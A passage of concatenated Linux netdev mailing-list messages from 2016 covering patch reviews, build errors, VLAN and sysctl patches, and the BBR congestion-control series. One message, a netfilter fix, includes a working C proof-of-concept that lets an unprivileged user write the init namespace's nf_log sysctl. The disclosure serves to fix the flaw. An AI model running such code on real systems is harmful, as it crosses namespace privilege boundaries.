> b/drivers/net/ethernet/mellanox/mlx5/core/fs_cmd.c
> index 9134010..287ade1 100644
> --- a/drivers/net/ethernet/mellanox/mlx5/core/fs_cmd.c
> +++ b/drivers/net/ethernet/mellanox/mlx5/core/fs_cmd.c
> @@ -425,11 +425,11 @@ struct mlx5_cmd_fc_bulk *
>  mlx5_cmd_fc_bulk_alloc(struct mlx5_core_dev *dev, u16 id, int num)
>  {
>   struct mlx5_cmd_fc_bulk *b;
> - int outlen = sizeof(*b) +
> + int outlen =
>   MLX5_ST_SZ_BYTES(query_flow_counter_out) +
>   MLX5_ST_SZ_BYTES(traffic_counter) * num;
>
> - b = kzalloc(outlen, GFP_KERNEL);
> + b = kzalloc(sizeof(*b) + outlen, GFP_KERNEL);
>   if (!b)
>   return NULL;
  ^ very controversial decision.
The code flow mlx5_fc_stats_query->mlx5_cmd_fc_bulk_alloc->kzalloc
failure is the same for success scenario too.

It is not related to the proposed patch.

>
> --
> 2.3.7
>


signature.asc
Description: PGP signature

Re: [PATCH net-next 2/3] r8152: support ECM mode

2016-09-18 Thread kbuild test robot

Hi Hayes,

[auto build test ERROR on net-next/master]

url:
https://github.com/0day-ci/linux/commits/Hayes-Wang/r8152-configuration-setting/20160907-192351
config: i386-randconfig-x0-09182136 (attached as .config)
compiler: gcc-6 (Debian 6.2.0-3) 6.2.0 20160901
reproduce:
# save the attached .config to linux build tree
make ARCH=i386 

All errors (new ones prefixed by >>):

   drivers/built-in.o: In function `r815x_mdio_write':
>> r8152.c:(.text+0x19a664): undefined reference to `usbnet_write_cmd'
   drivers/built-in.o: In function `r815x_mdio_read':
>> r8152.c:(.text+0x19a6ae): undefined reference to `usbnet_read_cmd'
   drivers/built-in.o: In function `rtl_usbnet_disconnect':
>> r8152.c:(.text+0x19aaa9): undefined reference to `usbnet_disconnect'
   drivers/built-in.o: In function `rtl_ecm_bind':
>> r8152.c:(.text+0x19c143): undefined reference to `usbnet_cdc_bind'
   r8152.c:(.text+0x19c175): undefined reference to `usbnet_write_cmd'
>> r8152.c:(.text+0x19c1e8): undefined reference to `usbnet_cdc_unbind'
   drivers/built-in.o: In function `rtl_usbnet_suspend':
>> r8152.c:(.text+0x19d3ab): undefined reference to `usbnet_suspend'
   drivers/built-in.o: In function `rtl_usbnet_probe':
>> r8152.c:(.text+0x19d7bd): undefined reference to `usbnet_probe'
   drivers/built-in.o: In function `rtl_usbnet_reset_resume':
>> r8152.c:(.text+0x19ec33): undefined reference to `usbnet_resume'
   drivers/built-in.o: In function `rtl_usbnet_resume':
   r8152.c:(.text+0x19ec68): undefined reference to `usbnet_resume'
   drivers/built-in.o: In function `lkdtm_rodata_do_nothing':
>> (.rodata+0x3538c): undefined reference to `usbnet_cdc_unbind'
   drivers/built-in.o: In function `lkdtm_rodata_do_nothing':
>> (.rodata+0x3539c): undefined reference to `usbnet_manage_power'
   drivers/built-in.o: In function `lkdtm_rodata_do_nothing':
>> (.rodata+0x353a0): undefined reference to `usbnet_cdc_status'

---
0-DAY kernel test infrastructureOpen Source Technology Center
https://lists.01.org/pipermail/kbuild-all   Intel Corporation


.config.gz
Description: application/gzip

[PATCH v2 net-next] MAINTAINERS: Add an entry for the core network DSA code

2016-09-18 Thread Andrew Lunn

The core distributed switch architecture code currently does not have
a MAINTAINERS entry, which results in some contributions not landing
in the right peoples inbox.

Signed-off-by: Andrew Lunn 
---
v2: Add include/net/dsa.h and drivers/net/dsa/

 MAINTAINERS | 9 +
 1 file changed, 9 insertions(+)

diff --git a/MAINTAINERS b/MAINTAINERS
index ce80b36aab69..8c8a2e40bdbb 100644
--- a/MAINTAINERS
+++ b/MAINTAINERS
@@ -8169,6 +8169,15 @@ S:   Maintained
 W: https://fedorahosted.org/dropwatch/
 F: net/core/drop_monitor.c
 
+NETWORKING [DSA]
+M: Andrew Lunn 
+M: Vivien Didelot 
+M: Florian Fainelli 
+S: Maintained
+F: net/dsa/
+F: include/net/dsa.h
+F: drivers/net/dsa/
+
 NETWORKING [GENERAL]
 M: "David S. Miller" 
 L: netdev@vger.kernel.org
-- 
2.9.3

skb_splice_bits() and large chunks in pipe (was Re: xfs_file_splice_read: possible circular locking dependency detected

2016-09-18 Thread Al Viro

FWIW, I'm not sure if skb_splice_bits() can't land us in trouble; fragments
might come from compound pages and I'm not entirely convinced that we won't
end up with coalesced fragments putting more than PAGE_SIZE into a single
pipe_buffer.  And that could badly confuse a bunch of code.

Can that legitimately happen?  If so, we'll need to audit quite a few
->splice_write()-related codepaths; FUSE, in particular, is very likely
to be unhappy with that kind of stuff, and it's not the only place where
we might count upon never seeing e.g. longer than PAGE_SIZE chunks in
bio_vec.  It shouldn't be all that hard to fix, but if the whole thing
is simply impossible, I would rather avoid that round of RTFS at the moment...

Comments?

Re: [PATCH net-next 2/2] net/sched: act_vlan: Introduce TCA_VLAN_ACT_MODIFY vlan action

2016-09-18 Thread Jamal Hadi Salim


On 16-09-18 10:33 AM, Shmulik Ladkani wrote:

TCA_VLAN_ACT_MODIFY allows one to change an existing tag.

It accepts same attributes as TCA_VLAN_ACT_PUSH (protocol, id,
priority).
If packet is vlan tagged, then the tag gets overwritten according to
user specified attributes.

For example, this allows user to replace a tag's vid while preserving
its priority bits (as opposed to "action vlan pop pipe action vlan push").

Signed-off-by: Shmulik Ladkani 
---
 include/uapi/linux/tc_act/tc_vlan.h |  1 +
 net/sched/act_vlan.c| 29 -
 2 files changed, 29 insertions(+), 1 deletion(-)

diff --git a/include/uapi/linux/tc_act/tc_vlan.h 
b/include/uapi/linux/tc_act/tc_vlan.h
index be72b6e384..bddb272b84 100644
--- a/include/uapi/linux/tc_act/tc_vlan.h
+++ b/include/uapi/linux/tc_act/tc_vlan.h
@@ -16,6 +16,7 @@

 #define TCA_VLAN_ACT_POP   1
 #define TCA_VLAN_ACT_PUSH  2
+#define TCA_VLAN_ACT_MODIFY3

 struct tc_vlan {
tc_gen;
diff --git a/net/sched/act_vlan.c b/net/sched/act_vlan.c
index 59a8d3150a..e5eeaa7a01 100644
--- a/net/sched/act_vlan.c
+++ b/net/sched/act_vlan.c
@@ -30,6 +30,7 @@ static int tcf_vlan(struct sk_buff *skb, const struct 
tc_action *a,
struct tcf_vlan *v = to_vlan(a);
int action;
int err;
+   u16 tci;

spin_lock(&v->tcf_lock);
tcf_lastuse_update(&v->tcf_tm);
@@ -48,6 +49,30 @@ static int tcf_vlan(struct sk_buff *skb, const struct 
tc_action *a,
if (err)
goto drop;
break;
+   case TCA_VLAN_ACT_MODIFY:
+   if (!skb_vlan_tagged(skb))
+   goto unlock;
+   /* extract existing tag (and guarantee no hwaccel tag) */
+   if (skb_vlan_tag_present(skb)) {
+   tci = skb_vlan_tag_get(skb);
+   skb->vlan_tci = 0;
+   } else {
+   if (skb->mac_len < VLAN_ETH_HLEN)
+   goto unlock;
+   err = __skb_vlan_pop(skb, &tci);
+   if (err)
+   goto drop;
+   }
+   /* replace the vid */
+   tci = (tci & ~VLAN_VID_MASK) | v->tcfv_push_vid;
+   /* replace prio bits, if tcfv_push_prio specified */
+   if (v->tcfv_push_prio) {
+   tci &= ~VLAN_PRIO_MASK;
+   tci |= v->tcfv_push_prio << VLAN_PRIO_SHIFT;
+   }
+   /* put updated tci as hwaccel tag */
+   __vlan_hwaccel_put_tag(skb, v->tcfv_push_proto, tci);
+   break;
default:
BUG();
}
@@ -102,6 +127,7 @@ static int tcf_vlan_init(struct net *net, struct nlattr 
*nla,
case TCA_VLAN_ACT_POP:
break;
case TCA_VLAN_ACT_PUSH:
+   case TCA_VLAN_ACT_MODIFY:
if (!tb[TCA_VLAN_PUSH_VLAN_ID]) {
if (exists)
tcf_hash_release(*a, bind);
@@ -185,7 +211,8 @@ static int tcf_vlan_dump(struct sk_buff *skb, struct 
tc_action *a,
if (nla_put(skb, TCA_VLAN_PARMS, sizeof(opt), &opt))
goto nla_put_failure;

-   if (v->tcfv_action == TCA_VLAN_ACT_PUSH &&
+   if ((v->tcfv_action == TCA_VLAN_ACT_PUSH ||
+v->tcfv_action == TCA_VLAN_ACT_MODIFY) &&
(nla_put_u16(skb, TCA_VLAN_PUSH_VLAN_ID, v->tcfv_push_vid) ||
 nla_put_be16(skb, TCA_VLAN_PUSH_VLAN_PROTOCOL,
  v->tcfv_push_proto) ||




Nice. If you didnt do it I would have ;->

Acked-by: Jamal Hadi Salim 

cheers,
jamal

[PATCH] netfilter: fix namespace handling in nf_log_proc_dostring

2016-09-18 Thread Jann Horn

nf_log_proc_dostring() used current's network namespace instead of the one
corresponding to the sysctl file the write was performed on. Because the
permission check happens at open time and the nf_log files in namespaces
are accessible for the namespace owner, this can be abused by an
unprivileged user to effectively write to the init namespace's nf_log
sysctls.

Stash the "struct net *" in extra2 - data and extra1 are already used.

Repro code:

#define _GNU_SOURCE
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 

char child_stack[100];

uid_t outer_uid;
gid_t outer_gid;
int stolen_fd = -1;

void writefile(char *path, char *buf) {
int fd = open(path, O_WRONLY);
if (fd == -1)
err(1, "unable to open thing");
if (write(fd, buf, strlen(buf)) != strlen(buf))
err(1, "unable to write thing");
close(fd);
}

int child_fn(void *p_) {
if (mount("proc", "/proc", "proc", MS_NOSUID|MS_NODEV|MS_NOEXEC,
  NULL))
err(1, "mount");

/* Yes, we need to set the maps for the net sysctls to recognize us
 * as namespace root.
 */
char buf[1000];
sprintf(buf, "0 %d 1\n", (int)outer_uid);
writefile("/proc/1/uid_map", buf);
writefile("/proc/1/setgroups", "deny");
sprintf(buf, "0 %d 1\n", (int)outer_gid);
writefile("/proc/1/gid_map", buf);

stolen_fd = open("/proc/sys/net/netfilter/nf_log/2", O_WRONLY);
if (stolen_fd == -1)
err(1, "open nf_log");
return 0;
}

int main(void) {
outer_uid = getuid();
outer_gid = getgid();

int child = clone(child_fn, child_stack + sizeof(child_stack),
  CLONE_FILES|CLONE_NEWNET|CLONE_NEWNS|CLONE_NEWPID
  |CLONE_NEWUSER|CLONE_VM|SIGCHLD, NULL);
if (child == -1)
err(1, "clone");
int status;
if (wait(&status) != child)
err(1, "wait");
if (!WIFEXITED(status) || WEXITSTATUS(status) != 0)
errx(1, "child exit status bad");

char *data = "NONE";
if (write(stolen_fd, data, strlen(data)) != strlen(data))
err(1, "write");
return 0;
}

Repro:

$ gcc -Wall -o attack attack.c -std=gnu99
$ cat /proc/sys/net/netfilter/nf_log/2
nf_log_ipv4
$ ./attack
$ cat /proc/sys/net/netfilter/nf_log/2
NONE

Because this looks like an issue with very low severity, I'm sending it to
the public list directly.

Signed-off-by: Jann Horn 
---
 net/netfilter/nf_log.c | 6 --
 1 file changed, 4 insertions(+), 2 deletions(-)

diff --git a/net/netfilter/nf_log.c b/net/netfilter/nf_log.c
index aa5847a..1df2c8d 100644
--- a/net/netfilter/nf_log.c
+++ b/net/netfilter/nf_log.c
@@ -420,7 +420,7 @@ static int nf_log_proc_dostring(struct ctl_table *table, 
int write,
char buf[NFLOGGER_NAME_LEN];
int r = 0;
int tindex = (unsigned long)table->extra1;
-   struct net *net = current->nsproxy->net_ns;
+   struct net *net = table->extra2;
 
if (write) {
struct ctl_table tmp = *table;
@@ -474,7 +474,6 @@ static int netfilter_log_sysctl_init(struct net *net)
 3, "%d", i);
nf_log_sysctl_table[i].procname =
nf_log_sysctl_fnames[i];
-   nf_log_sysctl_table[i].data = NULL;
nf_log_sysctl_table[i].maxlen = NFLOGGER_NAME_LEN;
nf_log_sysctl_table[i].mode = 0644;
nf_log_sysctl_table[i].proc_handler =
@@ -484,6 +483,9 @@ static int netfilter_log_sysctl_init(struct net *net)
}
}
 
+   for (i = NFPROTO_UNSPEC; i < NFPROTO_NUMPROTO; i++)
+   table[i].extra2 = net;
+
net->nf.nf_log_dir_header = register_net_sysctl(net,
"net/netfilter/nf_log",
table);
-- 
2.1.4

Re: [iproute PATCH] tc: don't accept qdisc 'handle' greater than ffff

2016-09-18 Thread Phil Sutter

On Fri, Sep 16, 2016 at 10:30:00AM +0200, Davide Caratti wrote:
> since get_qdisc_handle() truncates the input value to 16 bit, return an
> error and prompt "invalid qdisc ID" in case input 'handle' parameter needs
> more than 16 bit to be stored.
> 
> Signed-off-by: Davide Caratti 

Acked-by: Phil Sutter

Re: [patch net-next RFC 0/2] fib4 offload: notifier to let hw to be aware of all prefixes

2016-09-18 Thread Florian Fainelli

Le 06/09/2016 à 05:01, Jiri Pirko a écrit :
> From: Jiri Pirko 
> 
> This is RFC, unfinished. I came across some issues in the process so I would
> like to share those and restart the fib offload discussion in order to make it
> really usable.
> 
> So the goal of this patchset is to allow driver to propagate all prefixes
> configured in kernel down HW. This is necessary for routing to work
> as expected. If we don't do that HW might forward prefixes known to kernel
> incorrectly. Take an example when default route is set in switch HW and there
> is an IP address set on a management (non-switch) port.
> 
> Currently, only fibs related to the switch port netdev are offloaded using
> switchdev ops. This model is not extendable so the first patch introduces
> a replacement: notifier to propagate fib additions and removals to whoever
> interested. The second patch makes mlxsw to adopt this new way, registering
> one notifier block for each mlxsw (asic) instance.

Instead of introducing another specialization of a notifier_block
implementation, could we somehow have a kernel-based netlink listener
which receives the same kind of event information from rtmsg_fib()?

The reason is that having such a facility would hook directly onto
existing rtmsg_* calls that exist throughout the stack, and that seems
to scale better.
-- 
Florian

Re: skb_splice_bits() and large chunks in pipe (was Re: xfs_file_splice_read: possible circular locking dependency detected

2016-09-18 Thread Linus Torvalds

On Sun, Sep 18, 2016 at 12:31 PM, Al Viro  wrote:
> FWIW, I'm not sure if skb_splice_bits() can't land us in trouble; fragments
> might come from compound pages and I'm not entirely convinced that we won't
> end up with coalesced fragments putting more than PAGE_SIZE into a single
> pipe_buffer.  And that could badly confuse a bunch of code.

The pipe buffer code is actually *supposed* to handle any size
allocations at all. They should *not* be limited by pages, exactly
because the data can come from huge-pages or just multi-page
allocations. It's definitely possible with networking, and networking
is one of the *primary* targets of splice in many ways.

So if the splice code ends up being confused by "this is not just
inside a single page", then the splice code is buggy, I think.

Why would splice_write() cases be confused anyway? A filesystem needs
to be able to handle the case of "this needs to be split" regardless,
since even if the source buffer were to fit in a page, the offset
might obviously mean that the target won't fit in a page.

Now, if you decide that you want to make the iterator always split
those possibly big cases and never have big iovec entries, I guess
that would potentially be ok. But my initial reaction is that they are
perfectly normal and should be handled normally, and any code that
depends on a splice buffer fitting in one page is just buggy and
should be fixed.

 Linus

Re: [PATCH RFC 04/11] net/mlx5e: Build RX SKB on demand

2016-09-18 Thread Tariq Toukan


Hi Alexei,

On 07/09/2016 8:34 PM, Alexei Starovoitov wrote:

On Wed, Sep 07, 2016 at 03:42:25PM +0300, Saeed Mahameed wrote:

For non-striding RQ configuration before this patch we had a ring
with pre-allocated SKBs and mapped the SKB->data buffers for
device.

For robustness and better RX data buffers management, we allocate a
page per packet and build_skb around it.

This patch (which is a prerequisite for XDP) will actually reduce
performance for normal stack usage, because we are now hitting a bottleneck
in the page allocator. A later patch of page reuse mechanism will be
needed to restore or even improve performance in comparison to the old
RX scheme.

Packet rate performance testing was done with pktgen 64B packets on xmit
side and TC drop action on RX side.

CPU: Intel(R) Xeon(R) CPU E5-2680 v3 @ 2.50GHz

Comparison is done between:
  1.Baseline, before 'net/mlx5e: Build RX SKB on demand'
  2.Build SKB with RX page cache (This patch)

StreamsBaselineBuild SKB+page-cacheImprovement
---
1  4.33Mpps  5.51Mpps27%
2  7.35Mpps  11.5Mpps52%
4  14.0Mpps  16.3Mpps16%
8  22.2Mpps  29.6Mpps20%
16 24.8Mpps  34.0Mpps17%

Impressive gains for build_skb. I think it should help ip forwarding too
and likely tcp_rr. tcp_stream shouldn't see any difference.
If you can benchmark that along with pktgen+tc_drop it would
help to better understand the impact of the changes.

Why do you expect an improvement in tcp_rr?
I don't see such in my tests.

Re: [PATCH net 1/3] net/mlx5: Fix flow counter bulk command out mailbox allocation

2016-09-18 Thread Or Gerlitz

On Sun, Sep 18, 2016 at 9:02 PM, Leon Romanovsky  wrote:
> On Sun, Sep 18, 2016 at 06:20:27PM +0300, Or Gerlitz wrote:
>> From: Roi Dayan 

>> @@ -425,11 +425,11 @@ struct mlx5_cmd_fc_bulk *
>>  mlx5_cmd_fc_bulk_alloc(struct mlx5_core_dev *dev, u16 id, int num)
>>  {
>>   struct mlx5_cmd_fc_bulk *b;
>> - int outlen = sizeof(*b) +
>> + int outlen =
>>   MLX5_ST_SZ_BYTES(query_flow_counter_out) +
>>   MLX5_ST_SZ_BYTES(traffic_counter) * num;
>>
>> - b = kzalloc(outlen, GFP_KERNEL);
>> + b = kzalloc(sizeof(*b) + outlen, GFP_KERNEL);
>>   if (!b)
>>   return NULL;

>   ^ very controversial decision.
> The code flow mlx5_fc_stats_query->mlx5_cmd_fc_bulk_alloc->kzalloc
> failure is the same for success scenario too.

Sure, we will look on your comment and if needed come up with a
cleanup patch for net-next (4.9)

> It is not related to the proposed patch.

Correct, the proposed patch fixes a memory corruption that we want to
sort out for net (4.8)

Or.

Re: [PATCH] net: skbuff: Fix length validation in skb_vlan_pop()

2016-09-18 Thread pravin shelar

On Sun, Sep 18, 2016 at 3:09 AM, Shmulik Ladkani
 wrote:
> In 93515d53b1
>   "net: move vlan pop/push functions into common code"
> skb_vlan_pop was moved from its private location in openvswitch to
> skbuff common code.
>
> In case !vlan_tx_tag_present, the original 'pop_vlan()' assured
> that skb->len is sufficient for the existence of a vlan_ethhdr
> (if skb->len < VLAN_ETH_HLEN then pop was a no-op).
>
> This validation was moved as is into the new common 'skb_vlan_pop'.
>
> Alas, in its original location (openvswitch), there's a guarantee that
> 'data' points to the mac_header, therefore the 'skb->len < VLAN_ETH_HLEN'
> condition made sense.
> However there's no such guarantee in the generic 'skb_vlan_pop'.
>
> For short packets received in rx path going through 'skb_vlan_pop',
> this causes 'skb_vlan_pop' to fail pop-ing a valid vlan hdr (in case tag
> is in payload), or to fail moving next tag into hw-accel tag.
>
> Instead, verify that 'skb->mac_len' is sufficient.
>
> Signed-off-by: Shmulik Ladkani 
> ---
>  Spotted by code review while doing work augmenting tc act vlan.
>
>  net/core/skbuff.c | 4 ++--
>  1 file changed, 2 insertions(+), 2 deletions(-)
>
> diff --git a/net/core/skbuff.c b/net/core/skbuff.c
> index 1e329d4112..cc2c004838 100644
> --- a/net/core/skbuff.c
> +++ b/net/core/skbuff.c
> @@ -4537,7 +4537,7 @@ int skb_vlan_pop(struct sk_buff *skb)
> } else {
> if (unlikely((skb->protocol != htons(ETH_P_8021Q) &&
>   skb->protocol != htons(ETH_P_8021AD)) ||
> -skb->len < VLAN_ETH_HLEN))
> +skb->mac_len < VLAN_ETH_HLEN))

There is already check in __skb_vlan_pop() to validate skb for a vlan
header. So it is safe to drop this check entirely.

Re: [PATCH] net: hns: add function declarations in hns_dsaf_mac.h

2016-09-18 Thread Arnd Bergmann

On Sunday, September 18, 2016 5:11:36 PM CEST Baoyou Xie wrote:
> We get 2 warnings when building kernel with W=1:
> drivers/net/ethernet/hisilicon/hns/hns_dsaf_misc.c:246:6: warning: no 
> previous prototype for 'hns_dsaf_srst_chns' [-Wmissing-prototypes]
> drivers/net/ethernet/hisilicon/hns/hns_dsaf_misc.c:276:6: warning: no 
> previous prototype for 'hns_dsaf_roce_srst' [-Wmissing-prototypes]
> 
> In fact, these two functions are not declared in any file, but should
> be declared in a header file, thus can be recognized in other file.
> 
> So this patch adds the declarations into
> drivers/net/ethernet/hisilicon/hns/hns_dsaf_mac.h
> 
> Signed-off-by: Baoyou Xie 
> 

Why can't these be declared static?

Arnd

[PATCH] net: explicitly whitelist sysctls for unpriv namespaces

2016-09-18 Thread Jann Horn

There were two net sysctls that could be written from unprivileged net
namespaces, but weren't actually namespaced.

To fix the existing issues and prevent stuff this from happening again in
the future, explicitly whitelist permitted sysctls.

Note: The current whitelist is "allow everything that was previously
accessible and that doesn't obviously modify global state".

On my system, this patch just removes the write permissions for
ipv4/netfilter/ip_conntrack_max, which would have been usable for a local
DoS. With a different config, the ipv4/vs/debug_level sysctl would also be
affected.

Maximum impact of this seems to be local DoS, and it's a fairly large
commit, so I'm sending this publicly directly.

An alternative (and much smaller) fix would be to just change the
permissions of the two files in question to be 0444 in non-privileged
namespaces, but I believe that this solution is slightly less error-prone.
If you think I should switch to the simple fix, let me know.

Signed-off-by: Jann Horn 
---
 include/linux/sysctl.h |  1 +
 net/ax25/sysctl_net_ax25.c |  4 +++-
 net/ieee802154/6lowpan/reassembly.c|  7 +--
 net/ipv4/devinet.c |  2 ++
 net/ipv4/ip_fragment.c | 10 ++---
 net/ipv4/netfilter/nf_conntrack_l3proto_ipv4.c |  3 +++
 net/ipv4/netfilter/nf_conntrack_proto_icmp.c   |  2 ++
 net/ipv4/sysctl_net_ipv4.c |  4 +++-
 net/ipv4/xfrm4_policy.c|  1 +
 net/ipv6/addrconf.c|  1 +
 net/ipv6/icmp.c|  1 +
 net/ipv6/netfilter/nf_conntrack_proto_icmpv6.c |  1 +
 net/ipv6/netfilter/nf_conntrack_reasm.c|  7 +--
 net/ipv6/sysctl_net_ipv6.c | 23 ++---
 net/ipv6/xfrm6_policy.c|  1 +
 net/mpls/af_mpls.c |  2 ++
 net/netfilter/ipvs/ip_vs_ctl.c | 26 
 net/netfilter/nf_conntrack_proto_generic.c |  2 ++
 net/netfilter/nf_conntrack_proto_sctp.c| 16 +++
 net/netfilter/nf_conntrack_proto_tcp.c | 26 
 net/netfilter/nf_conntrack_proto_udp.c |  4 
 net/netfilter/nf_conntrack_proto_udplite.c |  2 ++
 net/netfilter/nf_log.c |  1 +
 net/rds/tcp.c  |  2 ++
 net/sctp/sysctl.c  |  4 +++-
 net/sysctl_net.c   | 28 +-
 26 files changed, 154 insertions(+), 27 deletions(-)

diff --git a/include/linux/sysctl.h b/include/linux/sysctl.h
index a4f7203..c47c52d 100644
--- a/include/linux/sysctl.h
+++ b/include/linux/sysctl.h
@@ -116,6 +116,7 @@ struct ctl_table
struct ctl_table_poll *poll;
void *extra1;
void *extra2;
+   bool namespaced;/* allow writes in unpriv netns? */
 };
 
 struct ctl_node {
diff --git a/net/ax25/sysctl_net_ax25.c b/net/ax25/sysctl_net_ax25.c
index 919a5ce..8e6ab36 100644
--- a/net/ax25/sysctl_net_ax25.c
+++ b/net/ax25/sysctl_net_ax25.c
@@ -158,8 +158,10 @@ int ax25_register_dev_sysctl(ax25_dev *ax25_dev)
if (!table)
return -ENOMEM;
 
-   for (k = 0; k < AX25_MAX_VALUES; k++)
+   for (k = 0; k < AX25_MAX_VALUES; k++) {
table[k].data = &ax25_dev->values[k];
+   table[k].namespaced = true;
+   }
 
snprintf(path, sizeof(path), "net/ax25/%s", ax25_dev->dev->name);
ax25_dev->sysheader = register_net_sysctl(&init_net, path, table);
diff --git a/net/ieee802154/6lowpan/reassembly.c 
b/net/ieee802154/6lowpan/reassembly.c
index 30d875d..8a1d5b7 100644
--- a/net/ieee802154/6lowpan/reassembly.c
+++ b/net/ieee802154/6lowpan/reassembly.c
@@ -456,7 +456,8 @@ static struct ctl_table lowpan_frags_ns_ctl_table[] = {
.maxlen = sizeof(int),
.mode   = 0644,
.proc_handler   = proc_dointvec_minmax,
-   .extra1 = &init_net.ieee802154_lowpan.frags.low_thresh
+   .extra1 = &init_net.ieee802154_lowpan.frags.low_thresh,
+   .namespaced = true,
},
{
.procname   = "6lowpanfrag_low_thresh",
@@ -465,7 +466,8 @@ static struct ctl_table lowpan_frags_ns_ctl_table[] = {
.mode   = 0644,
.proc_handler   = proc_dointvec_minmax,
.extra1 = &zero,
-   .extra2 = &init_net.ieee802154_lowpan.frags.high_thresh
+   .extra2 = &init_net.ieee802154_lowpan.frags.high_thresh,
+   .namespaced = true,
},
{
.procname   = "6lowpanfrag_time",
@@ -473,6 +475,7 @@ static struct ctl_table lowpan_frags_ns_ctl_table[] = {
.maxlen = sizeof(int),
.mode

Re: stmmac/RTL8211F/Meson GXBB: TX throughput problems

2016-09-18 Thread André Roth


Hello,

> For example, you could try disabling the scatter-gather or tx-cum
> via ethtool and seeing if there is some benefit; so we could image
> some problem on your HW or SYNP MAC integration for checksumming
> on tx side.

disabling the following: 
  ethtool -K eth0 sg off
or:
  ethtool -K eth0 tx off
does not prevent the network communication going down..

> Also you could check the AXI tuning and PBL value. To be honest
> (thinking about your problem) I can actually suspect some related
> problem on bus setup. So I suggest you to play with these value
> (better if you ask for having values from HW validation on your side).
> Otherwise the stmmac uses a default that cannot be good for your
> platform. For example, sometime I have seen that PBL is better if
> reduced to 8 instead of 32 and w/o 4xPBL...

how can I set those values ?

thanks for your time,

 andre

RE: [PATCH v4 09/16] IB/pvrdma: Add support for Completion Queues

2016-09-18 Thread Adit Ranadive

On Sun, Sep 18, 2016 at 10:07:18 -0700, Leon Romanovsky wrote: 
> On Thu, Sep 15, 2016 at 10:36:12AM +0300, Yuval Shaia wrote:
> > Hi Adit,
> > Please see my comments inline.
> >
> > Besides that I have no more comment for this patch.
> >
> > Reviewed-by: Yuval Shaia 
> >
> > Yuval
> >
> > On Thu, Sep 15, 2016 at 12:07:29AM +, Adit Ranadive wrote:
> > > On Wed, Sep 14, 2016 at 05:43:37 -0700, Yuval Shaia wrote:
> > > > On Sun, Sep 11, 2016 at 09:49:19PM -0700, Adit Ranadive wrote:
> > > > > +
> > > > > +static int pvrdma_poll_one(struct pvrdma_cq *cq, struct pvrdma_qp
> > > > **cur_qp,
> > > > > +struct ib_wc *wc)
> > > > > +{
> > > > > + struct pvrdma_dev *dev = to_vdev(cq->ibcq.device);
> > > > > + int has_data;
> > > > > + unsigned int head;
> > > > > + bool tried = false;
> > > > > + struct pvrdma_cqe *cqe;
> > > > > +
> > > > > +retry:
> > > > > + has_data = pvrdma_idx_ring_has_data(&cq->ring_state->rx,
> > > > > + cq->ibcq.cqe, &head);
> > > > > + if (has_data == 0) {
> > > > > + if (tried)
> > > > > + return -EAGAIN;
> > > > > +
> > > > > + /* Pass down POLL to give physical HCA a chance to 
> > > > > poll. */
> > > > > + pvrdma_write_uar_cq(dev, cq->cq_handle |
> > > > PVRDMA_UAR_CQ_POLL);
> > > > > +
> > > > > + tried = true;
> > > > > + goto retry;
> > > > > + } else if (has_data == PVRDMA_INVALID_IDX) {
> > > >
> > > > I didn't went throw the entire life cycle of RX-ring's head and tail 
> > > > but you
> > > > need to make sure that PVRDMA_INVALID_IDX error is recoverable one, i.e
> > > > there is probability that in the next call to pvrdma_poll_one it will 
> > > > be fine.
> > > > Otherwise it is an endless loop.
> > >
> > > We have never run into this issue internally but I don't think we can 
> > > recover here
> >
> > I briefly reviewed the life cycle of RX-ring's head and tail and didn't
> > caught any suspicious place that might corrupt it.
> > So glad to see that you never encountered this case.
> >
> > > in the driver. The only way to recover would be to destroy and recreate 
> > > the CQ
> > > which we shouldn't do since it could be used by multiple QPs.
> >
> > Agree.
> > But don't they hit the same problem too?
> >
> > > We don't have a way yet to recover in the device. Once we add that this 
> > > check
> > > should go away.
> >
> > To be honest i have no idea how to do that - i was expecting driver's 
> > vendors
> > to come up with an ideas :)
> > I once came up with an idea to force restart of the driver but it was
> > rejected.
> >
> > >
> > > The reason I returned an error value from poll_cq in v3 was to break the 
> > > possible
> > > loop so that it might give clients a chance to recover. But since poll_cq 
> > > is not expected
> > > to fail I just log the device error here. I can revert to that version if 
> > > you want to break
> > > the possible loop.
> >
> > Clients (ULPs) cannot recover from this case. They even do not check the
> > reason of the error and treats any error as -EAGAIN.
> 
> It is because poll_one is not expected to fall.

Poll_one is an internal function in our driver. ULPs should still be okay I 
think as long as poll_cq
does not fail, no?

[PATCH v3 net-next 00/16] tcp: BBR congestion control algorithm

2016-09-18 Thread Neal Cardwell

tcp: BBR congestion control algorithm

This patch series implements a new TCP congestion control algorithm:
BBR (Bottleneck Bandwidth and RTT). A paper with a detailed
description of BBR will be published in ACM Queue, September-October
2016, as "BBR: Congestion-Based Congestion Control". BBR is widely
deployed in production at Google.

The patch series starts with a set of supporting infrastructure
changes, including a few that extend the congestion control
framework. The last patch adds BBR as a TCP congestion control
module. Please see individual patches for the details.

- v2 -> v3: fix another issue caught by build bots:
 - adjust rate_sample struct initialization syntax to allow gcc-4.4 to compile
   the "tcp: track data delivery rate for a TCP connection" patch; also
   adjusted some similar syntax in "tcp_bbr: add BBR congestion control"

- v1 -> v2: fix issues caught by build bots:
 - fix "tcp: export data delivery rate" to use rate64 instead of rate,
   so there is a 64-bit numerator for the do_div call
 - fix conflicting definitions for minmax caused by
   "tcp: use windowed min filter library for TCP min_rtt estimation"
   with a new commit:
   tcp: cdg: rename struct minmax in tcp_cdg.c to avoid a naming conflict
 - fix warning about the use of __packed in
   "tcp: track data delivery rate for a TCP connection",
   which involves the addition of a new commit:
   tcp: switch back to proper tcp_skb_cb size check in tcp_init()  

Eric Dumazet (2):
  net_sched: sch_fq: add low_rate_threshold parameter
  tcp: switch back to proper tcp_skb_cb size check in tcp_init()

Neal Cardwell (8):
  lib/win_minmax: windowed min or max estimator
  tcp: use windowed min filter library for TCP min_rtt estimation
  tcp: count packets marked lost for a TCP connection
  tcp: allow congestion control module to request TSO skb segment count
  tcp: export tcp_tso_autosize() and parameterize minimum number of TSO
segments
  tcp: export tcp_mss_to_mtu() for congestion control modules
  tcp: increase ICSK_CA_PRIV_SIZE from 64 bytes to 88
  tcp_bbr: add BBR congestion control

Soheil Hassas Yeganeh (2):
  tcp: cdg: rename struct minmax in tcp_cdg.c to avoid a naming conflict
  tcp: track application-limited rate samples

Yuchung Cheng (4):
  tcp: track data delivery rate for a TCP connection
  tcp: export data delivery rate
  tcp: allow congestion control to expand send buffer differently
  tcp: new CC hook to set sending rate with rate_sample in any CA state

 include/linux/tcp.h|  14 +-
 include/linux/win_minmax.h |  37 ++
 include/net/inet_connection_sock.h |   4 +-
